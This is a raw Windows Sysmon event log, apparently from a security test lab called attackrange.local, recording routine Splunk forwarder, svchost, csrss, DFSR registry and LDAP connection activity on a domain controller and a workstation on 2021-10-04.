07:57:00.469{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104672Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.469{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104671Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.469{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104670Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.469{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B3CC-615A-F901-00000000FC01}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104669Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.469{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3CC-615A-F901-00000000FC01}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104668Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.470{58E9C193-B3CC-615A-F901-00000000FC01}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082571Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:01.889{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D33E8BC5EC4E249A2D88E60840179CE,SHA256=5BFCA59D5C11EF616BC0D76B929C08384E88EE2592DDB96439A246C82B743269,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000104682Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:01.781{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x8000000000000000104681Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:01.766{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Config SourceDWORD (0x00000001) 13241300x8000000000000000104680Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:01.766{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_4D264F37-7FD1-4957-AA29-D51476710399.XML 354300x8000000000000000104679Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.237{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51715-false10.0.1.12-8000- 23542300x8000000000000000104678Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:01.500{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3F303B6C4D4FC3AC8FE61B90241A74,SHA256=824A6A230611090DF67F645E95F699C9997495ED8DCD1932D1181459C90B2E38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082573Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:02.889{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B98140BAEA8D97447BACECAFEED0427,SHA256=D261CC4D0A46F8A6695AE1E7EAC339AA28598FAF2BFED43C963DB75DEA7968E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104693Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.813{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=998192179A854E5F9D05692A2545F6FD,SHA256=4740F31E0D978F29571ADAF48783839B66A2102E10EC078C21D0BDCC933A64EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104692Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.500{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA60736298DC85A5F7B8E16E66A1C48,SHA256=2DA7A1278AB5C5FA9D7AFF139461D510D30D452122ED4217CF75EF31D456884E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082572Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:59.708{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50103-false10.0.1.12-8000- 10341000x8000000000000000104691Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.407{58E9C193-B3CE-615A-FA01-00000000FC01}20524224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104690Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3CE-615A-FA01-00000000FC01}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104689Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104688Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104687Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104686Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B3CE-615A-FA01-00000000FC01}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104685Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104684Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.219{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3CE-615A-FA01-00000000FC01}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104683Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.220{58E9C193-B3CE-615A-FA01-00000000FC01}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082574Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:03.889{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AC75BB6152B658A93FC312D53CBDA58,SHA256=2B81C9D80BA3B37CC2C5ACA8F4A380D532E1B47F585AB6600901936F7D90190F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104717Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.036{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51718-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000104716Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.036{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51718-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000104715Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.025{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51717-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000104714Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.025{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51717-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000104713Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.004{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51716-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000104712Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:02.004{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51716-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 10341000x8000000000000000104711Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3CF-615A-FC01-00000000FC01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104710Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104709Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104708Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104707Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104706Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B3CF-615A-FC01-00000000FC01}6484C:\Program 